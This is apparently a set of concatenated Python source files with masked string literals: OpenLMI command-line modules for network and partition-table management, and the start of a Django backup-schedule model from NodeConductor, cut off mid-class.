<s> """<STR_LIT>""" <EOL> from lmi . scripts . common import command <EOL> from lmi . scripts . common import errors <EOL> from lmi . scripts . common . formatter import command as fcmd <EOL> from lmi . scripts . networking import * <EOL> def cmd_list_devices ( ns , device_names = None ) : <EOL> """<STR_LIT>""" <EOL> for d in list_devices ( ns , device_names ) : <EOL> yield ( d . ElementName , ns . LMI_IPNetworkConnection . OperatingStatusValues . value_name ( d . OperatingStatus ) , get_mac ( ns , d ) ) <EOL> def cmd_show_devices ( ns , device_names = None ) : <EOL> """<STR_LIT>""" <EOL> for device in list_devices ( ns , device_names ) : <EOL> yield fcmd . NewTableCommand ( title = "<STR_LIT>" % device . ElementName ) <EOL> yield ( "<STR_LIT>" , ns . LMI_IPNetworkConnection . OperatingStatusValues . value_name ( device . OperatingStatus ) ) <EOL> yield ( "<STR_LIT>" , get_mac ( ns , device ) ) <EOL> for ip , prefix in get_ipv4_addresses ( ns , device ) : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" % ( ip , prefix ) ) <EOL> for ip , mask in get_ipv6_addresses ( ns , device ) : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" % ( ip , mask ) ) <EOL> for gw in get_default_gateways ( ns , device ) : <EOL> yield ( "<STR_LIT>" , gw ) <EOL> for dns in get_dns_servers ( ns , device ) : <EOL> yield ( "<STR_LIT>" , dns ) <EOL> for setting in get_active_settings ( ns , device ) : <EOL> yield ( "<STR_LIT>" , setting . Caption ) <EOL> for setting in get_available_settings ( ns , device ) : <EOL> yield ( "<STR_LIT>" , setting . Caption ) <EOL> class ListDevice ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> class ShowDevice ( command . 
LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = [ ] <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> class Device ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { '<STR_LIT:list>' : ListDevice , '<STR_LIT>' : ShowDevice } <EOL> OWN_USAGE = True <EOL> SETTING_TYPE_DESC = { <EOL> SETTING_TYPE_UNKNOWN : '<STR_LIT>' , <EOL> SETTING_TYPE_ETHERNET : '<STR_LIT>' , <EOL> SETTING_TYPE_BRIDGE_MASTER : '<STR_LIT>' , <EOL> SETTING_TYPE_BRIDGE_SLAVE : '<STR_LIT>' , <EOL> SETTING_TYPE_BOND_MASTER : '<STR_LIT>' , <EOL> SETTING_TYPE_BOND_SLAVE : '<STR_LIT>' , <EOL> } <EOL> SETTING_IP_METHOD_DESC = { <EOL> SETTING_IP_METHOD_DISABLED : '<STR_LIT>' , <EOL> SETTING_IP_METHOD_DHCP : '<STR_LIT>' , <EOL> SETTING_IP_METHOD_STATIC : '<STR_LIT>' , <EOL> SETTING_IP_METHOD_STATELESS : '<STR_LIT>' , <EOL> SETTING_IP_METHOD_DHCPv6 : '<STR_LIT>' <EOL> } <EOL> SETTING_IPv4_METHODS = { <EOL> "<STR_LIT>" : SETTING_IP_METHOD_DISABLED , <EOL> "<STR_LIT>" : SETTING_IP_METHOD_DHCP , <EOL> "<STR_LIT>" : SETTING_IP_METHOD_STATIC <EOL> } <EOL> SETTING_IPv6_METHODS = { <EOL> "<STR_LIT>" : SETTING_IP_METHOD_DISABLED , <EOL> "<STR_LIT>" : SETTING_IP_METHOD_DHCPv6 , <EOL> "<STR_LIT>" : SETTING_IP_METHOD_STATIC , <EOL> "<STR_LIT>" : SETTING_IP_METHOD_STATELESS <EOL> } <EOL> def cmd_list_settings ( ns , captions = None ) : <EOL> for setting in list_settings ( ns , captions ) : <EOL> yield ( setting . Caption , SETTING_TYPE_DESC . get ( get_setting_type ( ns , setting ) , '<STR_LIT>' ) ) <EOL> def cmd_show_settings ( ns , captions = None ) : <EOL> for setting in list_settings ( ns , captions ) : <EOL> yield fcmd . NewTableCommand ( title = "<STR_LIT>" % setting . Caption ) <EOL> if setting . classname == "<STR_LIT>" : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> elif setting . 
classname == "<STR_LIT>" : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> yield ( "<STR_LIT>" , setting . InterfaceName ) <EOL> yield ( "<STR_LIT>" , setting . MIIMon ) <EOL> yield ( "<STR_LIT>" , ns . LMI_BondingMasterSettingData . ModeValues . value_name ( setting . Mode ) ) <EOL> yield ( "<STR_LIT>" , setting . UpDelay ) <EOL> yield ( "<STR_LIT>" , setting . DownDelay ) <EOL> yield ( "<STR_LIT>" , setting . ARPInterval ) <EOL> if len ( setting . ARPIPTarget ) > <NUM_LIT:0> : <EOL> yield ( "<STR_LIT>" , "<STR_LIT:U+002CU+0020>" . join ( setting . ARPIPTarget ) ) <EOL> elif setting . classname == "<STR_LIT>" : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> elif setting . classname == "<STR_LIT>" : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> yield ( "<STR_LIT>" , setting . InterfaceName ) <EOL> ip4method = get_setting_ip4_method ( ns , setting ) <EOL> if ip4method != SETTING_IP_METHOD_DISABLED : <EOL> yield ( "<STR_LIT>" , SETTING_IP_METHOD_DESC . get ( ip4method , '<STR_LIT>' ) ) <EOL> ip6method = get_setting_ip6_method ( ns , setting ) <EOL> if ip6method != SETTING_IP_METHOD_DISABLED : <EOL> yield ( "<STR_LIT>" , SETTING_IP_METHOD_DESC . get ( ip6method , '<STR_LIT>' ) ) <EOL> for subsetting in get_sub_setting ( ns , setting ) : <EOL> if subsetting . classname == '<STR_LIT>' : <EOL> if subsetting . ProtocolIFType == ns . LMI_ExtendedStaticIPAssignmentSettingData . ProtocolIFTypeValues . IPv4 : <EOL> version = "<STR_LIT>" <EOL> masks = subsetting . SubnetMasks <EOL> else : <EOL> version = "<STR_LIT>" <EOL> masks = subsetting . IPv6SubnetPrefixLengths <EOL> for i in range ( len ( subsetting . IPAddresses ) ) : <EOL> mask = masks [ i ] if i < len ( masks ) else "<STR_LIT>" <EOL> gateway = subsetting . GatewayAddresses [ i ] if i < len ( subsetting . GatewayAddresses ) else None <EOL> if i < len ( subsetting . GatewayAddresses ) and len ( subsetting . GatewayAddresses [ i ] ) > <NUM_LIT:0> : <EOL> yield ( "<STR_LIT>" % version , "<STR_LIT>" % ( subsetting . 
IPAddresses [ i ] , mask , subsetting . GatewayAddresses [ i ] ) ) <EOL> else : <EOL> yield ( "<STR_LIT>" % version , "<STR_LIT>" % ( subsetting . IPAddresses [ i ] , mask ) ) <EOL> elif subsetting . classname == '<STR_LIT>' : <EOL> for dns in subsetting . DNSServerAddresses : <EOL> yield ( "<STR_LIT>" , dns ) <EOL> elif subsetting . classname in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> yield ( "<STR_LIT>" , subsetting . Caption ) <EOL> elif subsetting . classname in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> yield ( "<STR_LIT>" , subsetting . Caption ) <EOL> if setting . classname not in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> for device in get_applicable_devices ( ns , setting ) : <EOL> yield ( "<STR_LIT>" , device . ElementName ) <EOL> if is_setting_active ( ns , setting ) : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if get_autoconnect ( ns , setting ) : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for route in get_static_routes ( ns , setting ) : <EOL> if route . AddressType == ns . LMI_IPRouteSettingData . AddressTypeValues . IPv4 : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" % ( route . DestinationAddress , route . DestinationMask , route . RouteMetric , route . NextHop ) ) <EOL> else : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" % ( route . DestinationAddress , route . PrefixLength , route . RouteMetric , route . NextHop ) ) <EOL> def cmd_activate ( ns , caption , device_name ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> if device_name : <EOL> device = get_device_by_name ( ns , device_name ) <EOL> if device is None : <EOL> raise errors . 
LmiFailed ( "<STR_LIT>" % device_name ) <EOL> else : <EOL> device = None <EOL> return activate ( ns , setting , device ) <EOL> def cmd_deactivate ( ns , caption , device_name ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> if device_name : <EOL> device = get_device_by_name ( ns , device_name ) <EOL> if device is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % device_name ) <EOL> else : <EOL> device = None <EOL> return deactivate ( ns , setting , device ) <EOL> class Activate ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , device_name ) : <EOL> return cmd_activate ( ns , caption , device_name ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in options and len ( options [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> class Deactivate ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , device_name ) : <EOL> return cmd_deactivate ( ns , caption , device_name ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in options and len ( options [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> def cmd_set_autoconnect ( ns , caption , device_name , enable ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> device = None <EOL> if device_name is not None : <EOL> device = get_device_by_name ( ns , device_name ) <EOL> if device is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % device_name ) <EOL> return set_autoconnect ( ns , setting , device , enable ) <EOL> class EnableAutoconnect ( command . 
LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , device_name ) : <EOL> return cmd_set_autoconnect ( ns , caption , device_name , True ) <EOL> class DisableAutoconnect ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , device_name ) : <EOL> return cmd_set_autoconnect ( ns , caption , device_name , False ) <EOL> class ShowAutoconnect ( command . LmiLister ) : <EOL> def execute ( self , ns , caption , device_name ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> device = None <EOL> if device_name is not None : <EOL> device = get_device_by_name ( ns , device_name ) <EOL> if device is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % device_name ) <EOL> if get_autoconnect ( ns , setting , device ) : <EOL> yield ( "<STR_LIT>" % caption , ) <EOL> else : <EOL> yield ( "<STR_LIT>" % caption , ) <EOL> class Autoconnect ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { '<STR_LIT>' : ShowAutoconnect , '<STR_LIT>' : EnableAutoconnect , '<STR_LIT>' : DisableAutoconnect } <EOL> OWN_USAGE = True <EOL> class ListSetting ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> class ShowSetting ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = [ ] <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> class CreateSetting ( command . 
LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , device_name , _ethernet , _bridging , _bonding , _ipv4 , _ipv6 ) : <EOL> type = SETTING_TYPE_ETHERNET <EOL> if _bridging : <EOL> type = SETTING_TYPE_BRIDGE_MASTER <EOL> elif _bonding : <EOL> type = SETTING_TYPE_BOND_MASTER <EOL> if _ipv4 not in SETTING_IPv4_METHODS : <EOL> raise errors . LmiInvalidOptions ( "<STR_LIT>" % _ipv4 ) <EOL> if _ipv6 not in SETTING_IPv6_METHODS : <EOL> raise errors . LmiInvalidOptions ( "<STR_LIT>" % _ipv6 ) <EOL> ipv4_method = SETTING_IPv4_METHODS [ _ipv4 ] <EOL> ipv6_method = SETTING_IPv6_METHODS [ _ipv6 ] <EOL> device = get_device_by_name ( ns , device_name ) <EOL> if device is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % device_name ) <EOL> create_setting ( ns , caption , device , type , ipv4_method , ipv6_method ) <EOL> return <NUM_LIT:0> <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in options and len ( options [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> class DeleteSetting ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return delete_setting ( ns , setting ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in options and len ( options [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> class Setting ( command . 
LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { '<STR_LIT:list>' : ListSetting , '<STR_LIT>' : ShowSetting , '<STR_LIT>' : CreateSetting , '<STR_LIT>' : DeleteSetting } <EOL> OWN_USAGE = True <EOL> def cmd_list_address ( ns , caption = None ) : <EOL> for setting in list_settings ( ns , caption ) : <EOL> for subsetting in get_sub_setting ( ns , setting ) : <EOL> if subsetting . classname == '<STR_LIT>' : <EOL> for i , address in enumerate ( subsetting . IPAddresses ) : <EOL> if subsetting . ProtocolIFType == ns . LMI_ExtendedStaticIPAssignmentSettingData . ProtocolIFTypeValues . IPv4 : <EOL> yield ( <EOL> "<STR_LIT>" , <EOL> address , <EOL> subsetting . SubnetMasks [ i ] , <EOL> subsetting . GatewayAddresses [ i ] ) <EOL> else : <EOL> yield ( <EOL> "<STR_LIT>" , <EOL> address , <EOL> subsetting . IPv6SubnetPrefixLengths [ i ] , <EOL> subsetting . GatewayAddresses [ i ] ) <EOL> class ListAddress ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class AddAddress ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address , prefix , gateway ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return add_ip_address ( ns , setting , address , prefix , gateway ) <EOL> class RemoveAddress ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return remove_ip_address ( ns , setting , address ) <EOL> class ReplaceAddress ( command . 
LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address , prefix , gateway ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return replace_ip_address ( ns , setting , address , prefix , gateway ) <EOL> class Address ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { <EOL> '<STR_LIT:list>' : ListAddress , <EOL> '<STR_LIT>' : AddAddress , <EOL> '<STR_LIT>' : RemoveAddress , <EOL> '<STR_LIT:replace>' : ReplaceAddress <EOL> } <EOL> OWN_USAGE = True <EOL> def cmd_list_route ( ns , caption = None ) : <EOL> for setting in list_settings ( ns , caption ) : <EOL> for route in get_static_routes ( ns , setting ) : <EOL> if route . AddressType == ns . LMI_IPRouteSettingData . AddressTypeValues . IPv4 : <EOL> yield ( <EOL> "<STR_LIT>" , <EOL> route . DestinationAddress , <EOL> route . DestinationMask , <EOL> route . RouteMetric , <EOL> route . NextHop ) <EOL> else : <EOL> yield ( <EOL> "<STR_LIT>" , <EOL> route . DestinationAddress , <EOL> route . PrefixLength , <EOL> route . RouteMetric , <EOL> route . NextHop ) <EOL> class ListRoute ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class AddRoute ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address , prefix , metric , next_hop ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return add_static_route ( ns , setting , address , prefix , metric , next_hop ) <EOL> class RemoveRoute ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . 
LmiFailed ( "<STR_LIT>" % caption ) <EOL> return remove_static_route ( ns , setting , address ) <EOL> class ReplaceRoute ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address , prefix , metric , next_hop ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return replace_static_route ( ns , setting , address , prefix , metric , next_hop ) <EOL> class Route ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { <EOL> '<STR_LIT:list>' : ListRoute , <EOL> '<STR_LIT>' : AddRoute , <EOL> '<STR_LIT>' : RemoveRoute , <EOL> '<STR_LIT:replace>' : ReplaceRoute <EOL> } <EOL> OWN_USAGE = True <EOL> def cmd_list_dns ( ns , caption = None ) : <EOL> for setting in list_settings ( ns , caption ) : <EOL> for subsetting in get_sub_setting ( ns , setting ) : <EOL> if subsetting . classname == '<STR_LIT>' : <EOL> for dns in subsetting . DNSServerAddresses : <EOL> if subsetting . ProtocolIFType == ns . LMI_DNSSettingData . ProtocolIFTypeValues . IPv4 : <EOL> yield ( "<STR_LIT>" , dns ) <EOL> else : <EOL> yield ( "<STR_LIT>" , dns ) <EOL> class ListDns ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class AddDns ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return add_dns_server ( ns , setting , address ) <EOL> class RemoveDns ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . 
LmiFailed ( "<STR_LIT>" % caption ) <EOL> return remove_dns_server ( ns , setting , address ) <EOL> class ReplaceDns ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return replace_dns_server ( ns , setting , address ) <EOL> class Dns ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { <EOL> '<STR_LIT:list>' : ListDns , <EOL> '<STR_LIT>' : AddDns , <EOL> '<STR_LIT>' : RemoveDns , <EOL> '<STR_LIT:replace>' : ReplaceDns <EOL> } <EOL> OWN_USAGE = True <EOL> class Enslave ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , master_caption , device_name ) : <EOL> setting = get_setting_by_caption ( ns , master_caption ) <EOL> device = get_device_by_name ( ns , device_name ) <EOL> return enslave ( ns , setting , device ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in options and len ( options [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> Networking = command . register_subcommands ( <EOL> '<STR_LIT>' , __doc__ , <EOL> { <EOL> '<STR_LIT>' : Device , <EOL> '<STR_LIT>' : Setting , <EOL> '<STR_LIT>' : Activate , <EOL> '<STR_LIT>' : Deactivate , <EOL> '<STR_LIT>' : Autoconnect , <EOL> '<STR_LIT>' : Enslave , <EOL> '<STR_LIT:address>' : Address , <EOL> '<STR_LIT>' : Route , <EOL> '<STR_LIT>' : Dns <EOL> } , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from lmi . shell . LMIUtil import lmi_isinstance <EOL> from lmi . scripts . common import command <EOL> from lmi . scripts . common import get_logger <EOL> from lmi . scripts . common . formatter import command as fcmd <EOL> from lmi . scripts . storage import show , fs , lvm , mount , raid , partition <EOL> from lmi . scripts . storage . common import ( size2str , get_devices , get_children , <EOL> get_parents , str2device , str2size , str2vg ) <EOL> LOG = get_logger ( __name__ ) <EOL> class PartitionTableList ( command . LmiLister ) : <EOL> COLUMNS = ( '<STR_LIT:Name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> def execute ( self , ns , devices = None ) : <EOL> """<STR_LIT>""" <EOL> cls = ns . LMI_DiskPartitionConfigurationCapabilities <EOL> for ( device , table ) in partition . get_partition_tables ( ns , devices ) : <EOL> LOG ( ) . debug ( "<STR_LIT>" , device . Name ) <EOL> largest_size = partition . get_largest_partition_size ( ns , device ) <EOL> largest_size = size2str ( largest_size , <EOL> self . app . config . human_friendly ) <EOL> if table . PartitionStyle == cls . PartitionStyleValues . MBR : <EOL> table_type = "<STR_LIT>" <EOL> else : <EOL> table_type = cls . PartitionStyleValues . value_name ( <EOL> table . PartitionStyle ) <EOL> yield ( device . Name , table_type , largest_size ) <EOL> class PartitionTableCreate ( command . LmiCheckResult ) : <EOL> EXPECT = None <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> def execute ( self , ns , devices , _gpt , _msdos ) : <EOL> """<STR_LIT>""" <EOL> if _msdos : <EOL> ptype = partition . PARTITION_TABLE_TYPE_MSDOS <EOL> else : <EOL> ptype = partition . PARTITION_TABLE_TYPE_GPT <EOL> for device in devices : <EOL> partition . 
create_partition_table ( ns , device , ptype ) <EOL> class PartitionTableShow ( command . LmiLister ) : <EOL> COLUMNS = ( '<STR_LIT:Name>' , '<STR_LIT>' ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> def execute ( self , ns , devices = None ) : <EOL> """<STR_LIT>""" <EOL> if not devices : <EOL> ret = partition . get_partition_tables ( ns ) <EOL> devices = [ i [ <NUM_LIT:0> ] for i in ret ] <EOL> for device in devices : <EOL> device = str2device ( ns , device ) <EOL> cmd = fcmd . NewTableCommand ( title = device . DeviceID ) <EOL> yield cmd <EOL> for line in show . partition_table_show ( <EOL> ns , device , self . app . config . human_friendly ) : <EOL> yield line <EOL> class PartitionTable ( command . LmiCommandMultiplexer ) : <EOL> OWN_USAGE = __doc__ <EOL> COMMANDS = { <EOL> '<STR_LIT:list>' : PartitionTableList , <EOL> '<STR_LIT>' : PartitionTableCreate , <EOL> '<STR_LIT>' : PartitionTableShow , <EOL> } </s>
from __future__ import unicode_literals
from datetime import datetime, timedelta
import logging

import pytz
from croniter.croniter import croniter
from django.db import models
from django.utils import timezone as django_timezone
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
from django.contrib.contenttypes import models as ct_models
from django.contrib.contenttypes import fields as ct_fields
from django_fsm import transition, FSMIntegerField
from jsonfield import JSONField

from nodeconductor.core import models as core_models
from nodeconductor.core import fields as core_fields
from nodeconductor.backup import managers, exceptions, utils
from nodeconductor.logging.loggers import LoggableMixin

logger = logging.getLogger(__name__)


class BackupSourceAbstractModel(models.Model):
    """<STR_LIT>"""
    # Generic FK: lets schedules/backups point at any model instance.
    content_type = models.ForeignKey(ct_models.ContentType)
    object_id = models.PositiveIntegerField()
    backup_source = ct_fields.GenericForeignKey('<STR_LIT>', '<STR_LIT>')

    class Meta(object):
        abstract = True


@python_2_unicode_compatible
class BackupSchedule(core_models.UuidMixin,
                     core_models.DescribableMixin,
                     LoggableMixin,
                     BackupSourceAbstractModel):
    """<STR_LIT>"""
    # Days to keep each produced backup (falsy means keep forever — see
    # _create_backup, which leaves kept_until as None in that case).
    retention_time = models.PositiveIntegerField(
        help_text='<STR_LIT>')
    # Cap on live backups; extras are deleted oldest-first.
    maximal_number_of_backups = models.PositiveSmallIntegerField()
    # Cron expression driving next_trigger_at (parsed with croniter).
    schedule = core_fields.CronScheduleField(max_length=<NUM_LIT:15>)
    next_trigger_at = models.DateTimeField(null=True)
    is_active = models.BooleanField(default=False)
    timezone = models.CharField(max_length=<NUM_LIT:50>, default=django_timezone.get_current_timezone_name)

    def __str__(self):
        return '<STR_LIT>' % {
            '<STR_LIT>': self.uuid,
            '<STR_LIT:object>': self.backup_source,
            '<STR_LIT>': self.schedule,
        }

    def _update_next_trigger_at(self):
        """<STR_LIT>"""
        # NOTE(review): .replace(tzinfo=...) swaps the tzinfo without
        # converting the wall-clock time — confirm this is intended rather
        # than pytz localize/astimezone.
        base_time = django_timezone.now().replace(tzinfo=pytz.timezone(self.timezone))
        self.next_trigger_at = croniter(self.schedule, base_time).get_next(datetime)

    def _check_backup_source_state(self):
        """<STR_LIT>"""
        # Only back up sources in a stable state; otherwise warn and skip.
        state = self.backup_source.state
        if state not in self.backup_source.States.STABLE_STATES:
            logger.warning('<STR_LIT>' % (self.backup_source, state))
            return False
        return True

    def _create_backup(self):
        """<STR_LIT>"""
        if not self._check_backup_source_state():
            return
        # Falsy retention_time -> kept_until stays None (no expiry).
        kept_until = django_timezone.now() + timedelta(days=self.retention_time) if self.retention_time else None
        backup = Backup.objects.create(
            backup_schedule=self,
            backup_source=self.backup_source,
            kept_until=kept_until,
            description='<STR_LIT>')
        backup.start_backup()
        return backup

    def _delete_extra_backups(self):
        """<STR_LIT>"""
        # Count only live backups, then delete the oldest surplus ones.
        exclude_states = (Backup.States.DELETING, Backup.States.DELETED, Backup.States.ERRED)
        backups_count = self.backups.exclude(state__in=exclude_states).count()
        extra_backups_count = backups_count - self.maximal_number_of_backups
        if extra_backups_count > <NUM_LIT:0>:
            for backup in self.backups.order_by('<STR_LIT>')[:extra_backups_count]:
                backup.start_deletion()

    def execute(self):
        """<STR_LIT>"""
        # One scheduler tick: create, prune, reschedule, persist.
        self._create_backup()
        self._delete_extra_backups()
        self._update_next_trigger_at()
        self.save()

    def save(self, *args, **kwargs):
        """<STR_LIT>"""
        # Recompute next_trigger_at on first save, on activation, or when
        # the cron expression changed.
        try:
            prev_instance = BackupSchedule.objects.get(pk=self.pk)
        except BackupSchedule.DoesNotExist:
            prev_instance = None
        if prev_instance is None or (not prev_instance.is_active and self.is_active or
                                     self.schedule != prev_instance.schedule):
            self._update_next_trigger_at()
        super(BackupSchedule, self).save(*args, **kwargs)

    def get_log_fields(self):
        return ('<STR_LIT>', '<STR_LIT:name>', '<STR_LIT>')


@python_2_unicode_compatible
class Backup(core_models.UuidMixin,
             core_models.DescribableMixin,
             LoggableMixin,
             BackupSourceAbstractModel):
    """<STR_LIT>"""
    # Schedule is optional: manual backups have none, and deleting a
    # schedule keeps its backups (SET_NULL).
    backup_schedule = models.ForeignKey(BackupSchedule, blank=True, null=True,
                                        on_delete=models.SET_NULL,
                                        related_name='<STR_LIT>')
    kept_until = models.DateTimeField(
        null=True,
        blank=True,
        help_text='<STR_LIT>')
    created_at = models.DateTimeField(auto_now_add=True)

    class States(object):
        # Lifecycle states for the FSM field below.
        READY = <NUM_LIT:1>
        BACKING_UP = <NUM_LIT:2>
        RESTORING = <NUM_LIT:3>
        DELETING = <NUM_LIT:4>
        ERRED = <NUM_LIT:5>
        DELETED = <NUM_LIT:6>

    STATE_CHOICES = (
